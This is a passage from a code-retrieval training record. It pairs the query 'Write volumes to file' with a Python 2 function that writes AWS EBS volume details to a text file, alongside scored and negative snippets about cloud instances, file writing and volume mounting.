db_inst:\n raise exception.MarkerNotFound(marker=marker)\n return db_inst", "def instance_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> pulumi.Output[int]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> pulumi.Output[int]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> pulumi.Output[int]:\n return pulumi.get(self, \"instance_id\")", "def get_primitive_instance_by_uuid(context, instance_uuid):\n instance = db.instance_get_by_uuid(context, instance_uuid)\n return jsonutils.to_primitive(instance)", "def get_instance(self, name):\n return self.website.instance.id", "def get_instance(instance_id: Optional[str] = None,\n location: Optional[str] = None,\n project: Optional[str] = None,\n opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetInstanceResult:\n __args__ = dict()\n __args__['instanceId'] = instance_id\n __args__['location'] = location\n __args__['project'] = project\n opts = pulumi.InvokeOptions.merge(_utilities.get_invoke_opts_defaults(), opts)\n __ret__ = pulumi.runtime.invoke('google-native:file/v1beta1:getInstance', __args__, opts=opts, typ=GetInstanceResult).value\n\n return AwaitableGetInstanceResult(\n capacity_gb=pulumi.get(__ret__, 'capacity_gb'),\n capacity_step_size_gb=pulumi.get(__ret__, 'capacity_step_size_gb'),\n create_time=pulumi.get(__ret__, 'create_time'),\n description=pulumi.get(__ret__, 'description'),\n directory_services=pulumi.get(__ret__, 'directory_services'),\n etag=pulumi.get(__ret__, 'etag'),\n file_shares=pulumi.get(__ret__, 'file_shares'),\n kms_key_name=pulumi.get(__ret__, 'kms_key_name'),\n labels=pulumi.get(__ret__, 'labels'),\n max_capacity_gb=pulumi.get(__ret__, 'max_capacity_gb'),\n max_share_count=pulumi.get(__ret__, 'max_share_count'),\n multi_share_enabled=pulumi.get(__ret__, 'multi_share_enabled'),\n name=pulumi.get(__ret__, 'name'),\n networks=pulumi.get(__ret__, 'networks'),\n protocol=pulumi.get(__ret__, 'protocol'),\n satisfies_pzs=pulumi.get(__ret__, 'satisfies_pzs'),\n state=pulumi.get(__ret__, 'state'),\n status_message=pulumi.get(__ret__, 'status_message'),\n suspension_reasons=pulumi.get(__ret__, 'suspension_reasons'),\n tier=pulumi.get(__ret__, 'tier'))", "def get_instance_template(self, name):\n return self.call_api('/global/instanceTemplates/%s' % name)", "def get_this_instance(settings, instance_id_ip, ip_given=False):\n instances = get_all_instances(settings)\n for instance in instances:\n if ip_given:\n current_ip = get_instance_ip(instance)\n if current_ip == instance_id_ip:\n return instance\n else:\n if instance.id == instance_id_ip:\n return instance", "def _get_instance(self):", "def _get_instance(self):", "def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n connection_string: Optional[pulumi.Input[str]] = None,\n description: Optional[pulumi.Input[str]] = None,\n instance_charge_type: Optional[pulumi.Input[str]] = None,\n instance_series: Optional[pulumi.Input[str]] = None,\n mysql_version: Optional[pulumi.Input[int]] = 
None,\n port: Optional[pulumi.Input[str]] = None,\n specification: Optional[pulumi.Input[str]] = None,\n vpc_id: Optional[pulumi.Input[str]] = None,\n vswitch_id: Optional[pulumi.Input[str]] = None,\n zone_id: Optional[pulumi.Input[str]] = None) -> 'Instance':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _InstanceState.__new__(_InstanceState)\n\n __props__.__dict__[\"connection_string\"] = connection_string\n __props__.__dict__[\"description\"] = description\n __props__.__dict__[\"instance_charge_type\"] = instance_charge_type\n __props__.__dict__[\"instance_series\"] = instance_series\n __props__.__dict__[\"mysql_version\"] = mysql_version\n __props__.__dict__[\"port\"] = port\n __props__.__dict__[\"specification\"] = specification\n __props__.__dict__[\"vpc_id\"] = vpc_id\n __props__.__dict__[\"vswitch_id\"] = vswitch_id\n __props__.__dict__[\"zone_id\"] = zone_id\n return Instance(resource_name, opts=opts, __props__=__props__)", "def instance_spec(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"instance_spec\")", "def instance_spec(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"instance_spec\")", "def get_instance(*, db_session, instance_id: int) -> WorkflowInstance:\n return (\n db_session.query(WorkflowInstance).filter(WorkflowInstance.id == instance_id).one_or_none()\n )", "def _instance_metadata(self, context, instance_uuid):\n return db.instance_metadata_get(context, instance_uuid)", "def target_instance(self):\n return self._target_instance", "def get_instance(instance_id: Optional[str] = None,\n location: Optional[str] = None,\n project: Optional[str] = None,\n opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetInstanceResult:\n __args__ = dict()\n __args__['instanceId'] = instance_id\n __args__['location'] = location\n __args__['project'] = project\n opts = pulumi.InvokeOptions.merge(_utilities.get_invoke_opts_defaults(), opts)\n __ret__ = pulumi.runtime.invoke('google-native:datafusion/v1beta1:getInstance', __args__, opts=opts, typ=GetInstanceResult).value\n\n return AwaitableGetInstanceResult(\n accelerators=pulumi.get(__ret__, 'accelerators'),\n api_endpoint=pulumi.get(__ret__, 'api_endpoint'),\n available_version=pulumi.get(__ret__, 'available_version'),\n create_time=pulumi.get(__ret__, 'create_time'),\n crypto_key_config=pulumi.get(__ret__, 'crypto_key_config'),\n dataproc_service_account=pulumi.get(__ret__, 'dataproc_service_account'),\n description=pulumi.get(__ret__, 'description'),\n disabled_reason=pulumi.get(__ret__, 'disabled_reason'),\n display_name=pulumi.get(__ret__, 'display_name'),\n enable_rbac=pulumi.get(__ret__, 'enable_rbac'),\n enable_stackdriver_logging=pulumi.get(__ret__, 'enable_stackdriver_logging'),\n enable_stackdriver_monitoring=pulumi.get(__ret__, 'enable_stackdriver_monitoring'),\n enable_zone_separation=pulumi.get(__ret__, 'enable_zone_separation'),\n event_publish_config=pulumi.get(__ret__, 'event_publish_config'),\n gcs_bucket=pulumi.get(__ret__, 'gcs_bucket'),\n labels=pulumi.get(__ret__, 'labels'),\n name=pulumi.get(__ret__, 'name'),\n network_config=pulumi.get(__ret__, 'network_config'),\n options=pulumi.get(__ret__, 'options'),\n p4_service_account=pulumi.get(__ret__, 'p4_service_account'),\n private_instance=pulumi.get(__ret__, 'private_instance'),\n satisfies_pzs=pulumi.get(__ret__, 'satisfies_pzs'),\n service_account=pulumi.get(__ret__, 'service_account'),\n service_endpoint=pulumi.get(__ret__, 'service_endpoint'),\n state=pulumi.get(__ret__, 
'state'),\n state_message=pulumi.get(__ret__, 'state_message'),\n tenant_project_id=pulumi.get(__ret__, 'tenant_project_id'),\n type=pulumi.get(__ret__, 'type'),\n update_time=pulumi.get(__ret__, 'update_time'),\n version=pulumi.get(__ret__, 'version'),\n zone=pulumi.get(__ret__, 'zone'))", "def instance_view(self) -> 'outputs.DedicatedHostInstanceViewResponse':\n return pulumi.get(self, \"instance_view\")", "def instance(self):\n return self.__instance", "def GetInstance():\n pass", "def name(self):\n return self._client.project_name + '/instances/' + self.instance_id", "def Get(self, instance_name, zone):\n project = properties.VALUES.core.project.Get(required=True)\n request = self.messages.ComputeInstancesGetRequest(\n zone=zone, project=project, instance=instance_name)\n instance = self.client.instances.Get(request)\n if self._VMCreatedByExecGroup(instance):\n return instance\n raise HttpNotFoundError(\n 'Instance:{} not found'.format(instance_name), None, None)", "def get_info(self, instance):\n shutdown_staues = ['deallocating', 'deallocated',\n 'stopping', 'stopped']\n instance_id = instance.uuid\n state = power_state.NOSTATE\n status = 'Unkown'\n try:\n vm = self.compute.virtual_machines.get(\n CONF.azure.resource_group, instance_id, expand='instanceView')\n # azure may raise msrestazure.azure_exceptions CloudError\n except exception.CloudError as e:\n msg = six.text_type(e)\n if 'ResourceNotFound' in msg:\n raise nova_ex.InstanceNotFound(instance_id=instance.uuid)\n else:\n LOG.exception(msg)\n ex = exception.InstanceGetFailure(reason=six.text_type(e),\n instance_uuid=instance_id)\n raise ex\n except Exception as e:\n msg = six.text_type(e)\n LOG.exception(msg)\n ex = exception.InstanceGetFailure(reason=six.text_type(e),\n instance_uuid=instance_id)\n raise ex\n else:\n LOG.debug('vm info is: {}'.format(vm))\n if vm and hasattr(vm, 'instance_view') and \\\n hasattr(vm.instance_view, 'statuses') and \\\n vm.instance_view.statuses is not None:\n for i in vm.instance_view.statuses:\n if hasattr(i, 'code') and \\\n i.code and 'PowerState' in i.code:\n status = i.code.split('/')[-1]\n if 'running' == status:\n state = power_state.RUNNING\n elif status in shutdown_staues:\n state = power_state.SHUTDOWN\n break\n LOG.info(_LI('vm: %(instance_id)s state is : %(status)s'),\n dict(instance_id=instance_id, status=status))\n return InstanceInfo(state=state, id=instance_id)", "def get_instance(self, container, cls, **params):\n if not cls in self.instances:\n self.instances[cls] = self.create_instance(container, cls, **params)\n \n return self.instances[cls]", "def readInstance(\n self,\n key,\n makeGlyphs=True,\n makeKerning=True,\n makeInfo=True,\n bendLocations=False,\n ):\n attrib, value = key\n for instanceElement in self.root.findall('.instances/instance'):\n if instanceElement.attrib.get(attrib) == value:\n self._readSingleInstanceElement(\n instanceElement,\n makeGlyphs=makeGlyphs,\n makeKerning=makeKerning,\n makeInfo=makeInfo,\n bendLocations=bendLocations,\n )\n return\n raise MutatorError(\"No instance found with key: (%s, %s).\" % key)", "def instance_identifier(self):\n return self._instance_identifier", "def get_instance(cls, pid, instance_id=None):\n if not instance_id:\n # Find an available instance.\n for inst in cls._instance_pool:\n if not inst.locked:\n inst._acquire_lock(pid)\n \n\n if hasattr(cls, \"_pyroDaemon\"):\n cls._pyroDaemon.register(inst)\n \n\n return inst\n # Otherwise make a new instance if possible\n if cls.managed:\n if cls.MAXINSTANCES is None or 
cls.ninstances < cls.MAXINSTANCES:\n instance_id = cls.ninstances if instance_id is None else instance_id\n\n cls.ninstances += 1\n # Make the status directory.\n\n if hasattr(cls, \"_pyroDaemon\"):\n status_dir = os.path.join(cls.STATUS_DIR, 'mc_{}'.format(cls.ninstances))\n if not os.path.exists(status_dir):\n os.makedirs(status_dir)\n else:\n status_dir = None\n\n inst = cls.Instance(cls._get_valid_port(), status_dir=status_dir, instance_id=instance_id)\n cls._instance_pool.append(inst)\n inst._acquire_lock(pid)\n\n if hasattr(cls, \"_pyroDaemon\"):\n cls._pyroDaemon.register(inst)\n\n return inst\n \n else:\n raise RuntimeError(\"No available instances and max instances reached! :O :O\")\n else:\n raise RuntimeError(\"No available instances and managed flag is off\")", "def get_instance_id(event):\n try:\n return event['detail']['instance-id']\n except KeyError as err:\n LOGGER.error(err)\n return False", "def get_instance(self, data):\n if self.transient:\n return None\n props = get_primary_keys(self.opts.model)\n filters = {prop.key: data.get(prop.key) for prop in props}\n if None not in filters.values():\n return self.session.query(self.opts.model).filter_by(**filters).first()\n return None", "def _aws_get_instance_by_tag(region, name, tag, raw):\n client = boto3.session.Session().client('ec2', region)\n matching_reservations = client.describe_instances(Filters=[{'Name': tag, 'Values': [name]}]).get('Reservations', [])\n instances = []\n [[instances.append(_aws_instance_from_dict(region, instance, raw)) # pylint: disable=expression-not-assigned\n for instance in reservation.get('Instances')] for reservation in matching_reservations if reservation]\n return instances", "def __get__(self, instance, owner=None):\r\n # Handle access on the model (i.e. 
Link.tags)\r\n if instance is None:\r\n return edit_string_for_tags(Tag.objects.usage_for_model(owner))\r\n\r\n tags = self._get_instance_tag_cache(instance)\r\n if tags is None:\r\n if instance.pk is None:\r\n self._set_instance_tag_cache(instance, '')\r\n else:\r\n self._set_instance_tag_cache(\r\n instance, edit_string_for_tags(Tag.objects.get_for_object(instance)))\r\n return self._get_instance_tag_cache(instance)", "def do_instance_show(cs, args):\n try:\n instance = cs.instances.detail(args.instance)\n except exceptions.NotFound as e:\n msg = \"No server with an id of '%s' exists\" % args.instance\n e.message = msg\n raise\n\n _print_server_details(instance)", "def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None) -> 'Instance':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = InstanceArgs.__new__(InstanceArgs)\n\n __props__.__dict__[\"create_time\"] = None\n __props__.__dict__[\"description\"] = None\n __props__.__dict__[\"etag\"] = None\n __props__.__dict__[\"file_shares\"] = None\n __props__.__dict__[\"instance_id\"] = None\n __props__.__dict__[\"kms_key_name\"] = None\n __props__.__dict__[\"labels\"] = None\n __props__.__dict__[\"location\"] = None\n __props__.__dict__[\"name\"] = None\n __props__.__dict__[\"networks\"] = None\n __props__.__dict__[\"project\"] = None\n __props__.__dict__[\"satisfies_pzs\"] = None\n __props__.__dict__[\"state\"] = None\n __props__.__dict__[\"status_message\"] = None\n __props__.__dict__[\"suspension_reasons\"] = None\n __props__.__dict__[\"tier\"] = None\n return Instance(resource_name, opts=opts, __props__=__props__)", "def show_instance(name, call=None):\n if call != \"action\":\n raise SaltCloudSystemExit(\n \"The show_instance action must be called with -a or --action.\"\n )\n\n nodes = list_nodes_full()\n __utils__[\"cloud.cache_node\"](nodes[name], _get_active_provider_name(), __opts__)\n return nodes[name]", "def get_instance(self, ix=None, name=None):\n assert ix is None or name is None\n if ix is None:\n instance = [ex for ex in self.instances if ex.name == name]\n assert len(instance) == 1\n return instance[0]\n else:\n return self.instances[ix]", "def GetMatchingInstance(instances, service=None, version=None, instance=None):\n if not instance:\n return SelectInstanceInteractive(instances, service=service,\n version=version)\n\n matching = FilterInstances(instances, service, version, instance)\n if len(matching) > 1:\n raise InvalidInstanceSpecificationError(\n 'More than one instance matches the given specification.\\n\\n'\n 'Matching instances: {0}'.format(map(str, sorted(matching))))\n elif not matching:\n raise InvalidInstanceSpecificationError(\n 'No instances match the given specification.\\n\\n'\n 'All instances: {0}'.format(map(str, sorted(instances))))\n return matching[0]" ]
[ "0.7441181", "0.7072989", "0.7054633", "0.7043838", "0.6983329", "0.69746256", "0.6915153", "0.6853248", "0.65906733", "0.65776145", "0.65776145", "0.65766394", "0.65577894", "0.65343606", "0.6420164", "0.6343189", "0.63384813", "0.63070196", "0.6281745", "0.62794745", "0.6265967", "0.62485546", "0.6241711", "0.6218576", "0.6211774", "0.6209884", "0.62071157", "0.62013066", "0.6147452", "0.61253107", "0.60900754", "0.60791045", "0.6035864", "0.6024225", "0.6010483", "0.5989189", "0.5989189", "0.5989189", "0.5989189", "0.5989189", "0.5989189", "0.59464186", "0.59444517", "0.59444517", "0.59444517", "0.59444517", "0.59091127", "0.5899663", "0.5880838", "0.5880838", "0.5880838", "0.5865778", "0.5859556", "0.5859556", "0.5859556", "0.5849953", "0.58484876", "0.5842656", "0.583499", "0.583499", "0.583499", "0.583499", "0.583499", "0.583499", "0.582623", "0.582623", "0.582623", "0.5816187", "0.5811985", "0.5808328", "0.5807185", "0.58009654", "0.57831466", "0.57831466", "0.5755083", "0.57521784", "0.57521784", "0.5749333", "0.5720636", "0.5716035", "0.5715815", "0.57142323", "0.57101494", "0.56968844", "0.56968284", "0.5692247", "0.5679578", "0.56722987", "0.5662924", "0.5643318", "0.5617047", "0.5613363", "0.56090915", "0.5608364", "0.5597738", "0.55911267", "0.558588", "0.5584785", "0.5575685", "0.5567781" ]
0.70240617
4
Write volumes to file
def generateInfoVolumes(regions):
    print "\nWriting volumes info to output file %s" % volumes_data_output_file
    with open(volumes_data_output_file, 'w') as f1:
        f1.write("VOLUMES\n")
        f1.write(
            "Name\tvolume_ID\tKEEP-tag_of_volume\tKEEP-tag_of_instance\tproduction?\tvolume_attachment_state\tassociated_instance\tinstance_state\tsize\tcreate_time\tregion\tzone\tassociated_snapshot\n\n")
        for r in regions:
            volumes = getVolumes(r)
            print "."  # give some feedback to the user
            for v in volumes:
                f1.write("%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\n" %
                         (get_name_tag(v), v.id, getKeepTag(v), getKeepTag(getInstanceOf(v)), isProduction(v),
                          v.attachment_state(), v.attach_data.instance_id, v.status, v.size, v.create_time,
                          v.region.name, v.zone, v.snapshot_id))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def write_inventory_file(inventory_item):\n try:\n with open('inventory', 'w') as file:\n file.write(inventory_item)\n except OSError:\n pass", "def write(self, filename):\n pass", "def write(self, filename):\n pass", "def add_writable_file_volume(self,\n runtime, # type: List[Text]\n volume, # type: MapperEnt\n host_outdir_tgt, # type: Optional[Text]\n tmpdir_prefix # type: Text\n ):\n if self.inplace_update:\n self._add_volume_binding(volume.resolved, volume.target, writable=True)\n else:\n if host_outdir_tgt:\n # shortcut, just copy to the output directory\n # which is already going to be mounted\n log.debug('shutil.copy({}, {})'.format(volume.resolved, host_outdir_tgt))\n shutil.copy(volume.resolved, host_outdir_tgt)\n else:\n log.debug('tempfile.mkdtemp(dir={})'.format(self.tmpdir))\n tmpdir = tempfile.mkdtemp(dir=self.tmpdir)\n file_copy = os.path.join(\n tmpdir, os.path.basename(volume.resolved))\n log.debug('shutil.copy({}, {})'.format(volume.resolved, file_copy))\n shutil.copy(volume.resolved, file_copy)\n self._add_volume_binding(file_copy, volume.target, writable=True)\n ensure_writable(host_outdir_tgt or file_copy)", "def write(cls, vas):\n with open(Y, 'w') as f_i:\n for items in vas:\n f_i.write('%s ' % items)\n print(\"File written successfully. Check out \\\"output.txt\\\" file\")\n f_i.close()", "def write_to_file(self, filename: str) -> None:", "def setupVolumes(volumes: Volumes) -> None:\n volumesList = readProcessJson(\n [\"podman\", \"volume\", \"ls\", \"--format\", \"json\"])\n existingVolumes: Set[str] = set()\n if volumesList:\n for volume in volumesList:\n existingVolumes.add(volume['name'])\n for volume in volumes.values():\n if volume.name not in existingVolumes:\n log.info(f\"Creating volume {volume.name}\")\n execute([\"podman\", \"volume\", \"create\", volume.name])\n if volume.files:\n for file in volume.files:\n path = Path(\"~/.local/share/containers/storage/volumes/\"\n f\"{volume.name}/_data/{file.name}\").expanduser()\n if not path.exists():\n log.info(f\"Writting {path}\")\n path.write_text(file.content)", "def write_to_file(inventory):\n env = Environment(loader=FileSystemLoader('templates'), trim_blocks=True)\n output_template = env.get_template('output.j2')\n # create and clean an 'outputs' folder\n path = \"./outputs\"\n try:\n shutil.rmtree(path, ignore_errors = True, onerror = None)\n except:\n print('Error while deleting directory')\n os.mkdir(path)\n os.chdir(path)\n for node, node_data in inventory.items():\n if 'outputs' in node_data:\n os.mkdir(node)\n for command, output in node_data['outputs'].items():\n # when creating filenames based on command, swap 'spaces' with 'underscores':\n command = re.sub(r\"\\s\", r\"_\", command)\n open(f\"{node}/{command}.txt\", 'a').write(\n output_template.render(node=node, data=output))\n print(\"\\n\" + f\"Job complete. 
If data gathering was successful, see 'outputs' directory.\")\n return inventory", "def volumes(self):", "def add_volume_info(self, vi):\n vol_num = vi.volume_number\n self.volume_info_dict[vol_num] = vi\n if self.fh:\n self.fh.write(vi.to_string() + \"\\n\")", "def write_to_disk(self):\n\n\t\t# print \"--------------------------------------------------------WRITING PIECE %r TO DISK\" %self.index\n\t\ttry:\n\t\t\tos.makedirs(PATH)\n\t\texcept:\n\t\t\tpass\n\t\tself.piece_file_name = os.path.join(PATH, self.torrent.name+'.'+'00'+str(self.index))\n\t\t# print \"Saving piece to file name: \", self.piece_file_name\n\t\tpiece_file = open(self.piece_file_name, 'w')\n\t\tpiece_file.write(self.data)\n\t\tpiece_file.close()", "def write (self, file):\n\t\tfile.write (self.pack ())", "def write(self, filename, data):\n owner_rw = 0600\n fd = os.open(filename, os.O_WRONLY | os.O_CREAT, owner_rw)\n # In case file existed already with wrong permissions, fix them.\n os.chmod(filename, owner_rw)\n os.write(fd, data)\n os.close(fd)", "def save(self, filepath: str | Path) -> None:\n extension = Path(filepath).suffix\n if extension.lower() in VIDEO_TYPES:\n video_writer = imageio.get_writer(filepath, macro_block_size=None)\n for slice in self.volume:\n slice = slice.astype(\"uint8\")\n video_writer.append_data(slice)\n video_writer.close()\n elif extension.lower() in IMAGE_TYPES:\n base = Path(filepath).stem\n print(\n \"Saving OCT as sequential slices {}_[1..{}]{}\".format(\n base, len(self.volume), extension\n )\n )\n full_base = Path(filepath).with_suffix(\"\")\n self.volume = np.array(self.volume).astype(\"float64\")\n self.volume *= 255.0 / self.volume.max()\n for index, slice in enumerate(self.volume):\n filename = \"{}_{}{}\".format(full_base, index, extension)\n cv2.imwrite(filename, slice)\n elif extension.lower() == \".npy\":\n np.save(filepath, self.volume)\n else:\n raise NotImplementedError(\n \"Saving with file extension {} not supported\".format(extension)\n )", "def _write(fdesc, data):\n while data:\n count = os.write(fdesc, data)\n data = data[count:]", "def write(self, fname):\n pass", "def add_file_or_directory_volume(self,\n runtime, # type: List[Text]\n volume, # type: MapperEnt\n host_outdir_tgt # type: Optional[Text]\n ):\n if not volume.resolved.startswith(\"_:\"):\n self._add_volume_binding(volume.resolved, volume.target) # this one defaults to read_only", "def update_volumes():\n print 'do something useful here'", "def write(self, file):\n #write header\n self.ID.write(file)\n if (self.write_size): \n self.size.write(file)\n for variable in self.variables:\n variable.write(file)\n for subchunk in self.subchunks:\n subchunk.write(file)", "def write_vectors(self, filename):\n svu.write_realvectors(self,filename)", "def writetofile(self,direction,value):\r\n output = str(\"{},{} \\n\".format(direction,value))\r\n self.new_file.write(output)", "def _save(self, name, content):\n full_path = self.path(name)\n with caches['default'].lock('{}_{}'.format(full_path, 'reader')):\n with caches['default'].lock('{}_{}'.format(full_path, 'writer')):\n if cache.islocked(full_path) is False:\n with cache.lock(full_path):\n cache.set(full_path, 'storage')\n try:\n directory = os.path.dirname(full_path)\n\n # Create any intermediate directories that do not exist.\n if self.__volume.exists(directory) is False:\n try:\n if self.directory_permissions_mode is not None:\n # os.makedirs applies the global umask, so we reset it,\n # for consistency with file_permissions_mode behavior.\n 
self.volume.makedirs(directory, self.directory_permissions_mode)\n else:\n self.volume.makedirs(directory)\n except FileNotFoundError:\n # There's a race between os.path.exists() and os.makedirs().\n # If os.makedirs() fails with FileNotFoundError, the directory\n # was created concurrently.\n pass\n if not os.path.isdir(directory):\n raise IOError(\"%s exists and is not a directory.\" % directory)\n\n # There's a potential race condition between get_available_name and\n # saving the file; it's possible that two threads might return the\n # same name, at which point all sorts of fun happens. So we need to\n # try to create the file, but if it already exists we have to go back\n # to get_available_name() and try again.\n\n while True:\n try:\n # This file has a file path that we can move.\n if hasattr(content, 'temporary_file_path'):\n file_move_safe(content.temporary_file_path(), full_path)\n\n # This is a normal uploadedfile that we can stream.\n else:\n # The current umask value is masked out by os.open!\n fd = self.__volume.open(full_path, self.OS_OPEN_FLAGS, 0o666)\n _file = None\n try:\n for chunk in content.chunks():\n if _file is None:\n _file = fd.dup()\n _file.write(chunk)\n finally:\n if _file is not None:\n _file.close()\n fd.close()\n except FileExistsError:\n # A new name is needed if the file exists.\n name = self.get_available_name(name)\n full_path = self.path(name)\n else:\n # OK, the file save worked. Break out of the loop.\n break\n\n if self.file_permissions_mode is not None:\n self.__volume.chmod(full_path, self.file_permissions_mode)\n finally:\n cache.delete(full_path)\n # Store filenames with forward slashes, even on Windows.\n return (True, name.replace('\\\\', '/'))\n return (False, cache.get(full_path))", "def write_data(filepath, container, ind=\"\\t\", is_sui=False, create_dirs=False, print_on_success=True):\n\n if create_dirs:\n os.makedirs(os.path.dirname(filepath), exist_ok=True)\n\n with open(filepath, mode=\"w\", encoding=\"utf8\", newline=\"\\r\\n\") as f:\n\n if not is_sui:\n f.write(\"SiiNunit\\n\")\n f.write(\"{\\n\")\n\n count = len(container)\n for i, unit in enumerate(container):\n _write_unit(f, unit, ind)\n\n if i < count - 1:\n f.write(\"\\n\")\n\n if not is_sui:\n f.write(\"}\\n\")\n\n if print_on_success:\n file_type = \"SUI\" if is_sui else \"SII\"\n lprint(\"I WRITTING %s FILE to: %r\", (file_type, filepath))\n\n return True", "def flow_write(filename,uv,v=None):\n nBands = 2\n\n if v is None:\n assert(uv.ndim == 3)\n assert(uv.shape[2] == 2)\n u = uv[:,:,0]\n v = uv[:,:,1]\n else:\n u = uv\n\n assert(u.shape == v.shape)\n height,width = u.shape\n f = open(filename,'wb')\n TAG_CHAR = b'PIEH'\n f.write(TAG_CHAR)\n np.array(width).astype(np.int32).tofile(f)\n np.array(height).astype(np.int32).tofile(f)\n # arrange into matrix form\n tmp = np.zeros((height, width*nBands))\n tmp[:,np.arange(width)*2] = u\n tmp[:,np.arange(width)*2 + 1] = v\n tmp.astype(np.float32).tofile(f)\n f.close()", "def write(self, filename):\n bvh_string = self.generate_bvh_string()\n if filename[-4:] == '.bvh':\n filename = filename\n else:\n filename = filename + '.bvh'\n with open(filename, 'w') as outfile:\n outfile.write(bvh_string)", "def put(self, filename, data, **kw):\n\n file_path = os.path.join(self.storage_path, filename)\n file_obj = open(file_path, \"w\")\n file_obj.write(data)", "def write(self, filename, data):\n raise NotImplementedError", "def flow_write(filename,uv,v=None):\n nBands = 2\n\n if v is None:\n assert(uv.ndim == 3)\n assert(uv.shape[2] == 
2)\n u = uv[:,:,0]\n v = uv[:,:,1]\n else:\n u = uv\n\n assert(u.shape == v.shape)\n height,width = u.shape\n f = open(filename,'wb')\n # write the header\n f.write(TAG_CHAR)\n np.array(width).astype(np.int32).tofile(f)\n np.array(height).astype(np.int32).tofile(f)\n # arrange into matrix form\n tmp = np.zeros((height, width*nBands))\n tmp[:,np.arange(width)*2] = u\n tmp[:,np.arange(width)*2 + 1] = v\n tmp.astype(np.float32).tofile(f)\n f.close()", "def write_to_file(self, filename):\n self.octree.write(str.encode(filename))\n print(\"Save octomap to \"+filename)", "def writable(path):", "def write(filename):\n print(uc.write(filename))", "def writeto(self, fileout):\n \n dump_pkl(self.data, fileout)", "def write_img_to_fs(name, data):\n with open(name, \"wb\") as fout:\n fout.write(data)", "def test_volumes_complex(self):\n with open(\".scuba.yml\", \"w\") as f:\n f.write(\n r\"\"\"\n image: na\n volumes:\n /foo: /host/foo\n /bar:\n hostpath: /host/bar\n /snap:\n hostpath: /host/snap\n options: z,ro\n \"\"\"\n )\n\n config = scuba.config.load_config(\".scuba.yml\")\n vols = config.volumes\n assert len(vols) == 3\n\n v = vols[\"/foo\"]\n assert isinstance(v, scuba.config.ScubaVolume)\n assert v.container_path == \"/foo\"\n assert v.host_path == \"/host/foo\"\n assert v.options == []\n\n v = vols[\"/bar\"]\n assert isinstance(v, scuba.config.ScubaVolume)\n assert v.container_path == \"/bar\"\n assert v.host_path == \"/host/bar\"\n assert v.options == []\n\n v = vols[\"/snap\"]\n assert isinstance(v, scuba.config.ScubaVolume)\n assert v.container_path == \"/snap\"\n assert v.host_path == \"/host/snap\"\n assert v.options == [\"z\", \"ro\"]", "def _call_writeVec(vecObj, filename, mode):\n res = vecObj.writeVec(filename, mode)\n return res", "def write_to_file(info: List[str]) -> None:\n return", "def write(self, instream: typ.BinaryIO, filepath: str,\r\n filename: str = None) -> None:\r\n if filename is not None:\r\n filename = path.basename(filename)\r\n if self.fs_type == 'FAT':\r\n allocator_metadata = self.fs.write(instream, filepath)\r\n self.metadata.add_file(filename, allocator_metadata)\r\n elif self.fs_type == 'NTFS':\r\n allocator_metadata = self.fs.write(instream, filepath)\r\n self.metadata.add_file(filename, allocator_metadata)\r\n else:\r\n raise NotImplementedError()", "def write_to_disk(self):\n text_file = open(self.file_path, \"w\")\n text_file.write(str(self))\n text_file.close()\n # dump to pickle\n pickle.dump(self.blockchain, open(self.pickle_path, \"wb\"))", "def filewrite(self, filename):\n io.write(self, filename)", "def write(cls, file, data):\n file.write(data)", "def write(init_time, end_time, vpk, media, rms):\n global data_file\n\n # atualiza o arquivo de dados\n update()\n\n # Salva os dados no arquivo\n data_file.write(\n str(init_time) + ',' + str(end_time) + ',' +\n str(vpk) + ',' + str(media) + ',' + str(rms) + '\\n'\n )", "def __mount_ebs_volume( self ):\n ebs_volume_size = self.instance_tag( 'ebs_volume_size' ) or '0'\n ebs_volume_size = int( ebs_volume_size )\n if ebs_volume_size:\n instance_name = self.instance_tag( 'Name' )\n cluster_ordinal = int( self.instance_tag( 'cluster_ordinal' ) )\n volume_name = '%s__%d' % (instance_name, cluster_ordinal)\n volume = EC2VolumeHelper( ec2=self.ec2,\n availability_zone=self.availability_zone,\n name=volume_name,\n size=ebs_volume_size,\n volume_type=\"gp2\" )\n # TODO: handle case where volume is already attached\n device_ext = '/dev/sdf'\n device = '/dev/xvdf'\n volume.attach( self.instance_id, device_ext )\n\n # 
Wait for inode to appear and make sure its a block device\n while True:\n try:\n assert stat.S_ISBLK( os.stat( device ).st_mode )\n break\n except OSError as e:\n if e.errno == errno.ENOENT:\n time.sleep( 1 )\n else:\n raise\n\n # Only format empty volumes\n volume_label = volume_label_hash( volume_name )\n if check_output( [ 'file', '-sL', device ] ).strip( ) == device + ': data':\n check_call( [ 'mkfs', '-t', 'ext4', device ] )\n check_call( [ 'e2label', device, volume_label ] )\n else:\n # If the volume is not empty, verify the file system label\n actual_label = check_output( [ 'e2label', device ] ).strip( )\n if actual_label != volume_label:\n raise AssertionError(\n \"Expected volume label '%s' (derived from '%s') but got '%s'\" %\n (volume_label, volume_name, actual_label) )\n current_mount_point = self.__mount_point( device )\n if current_mount_point is None:\n mkdir_p( self.persistent_dir )\n check_call( [ 'mount', device, self.persistent_dir ] )\n elif current_mount_point == self.persistent_dir:\n pass\n else:\n raise RuntimeError(\n \"Can't mount device %s on '%s' since it is already mounted on '%s'\" % (\n device, self.persistent_dir, current_mount_point) )\n else:\n # No persistent volume is attached and the root volume is off limits, so we will need\n # to place persistent 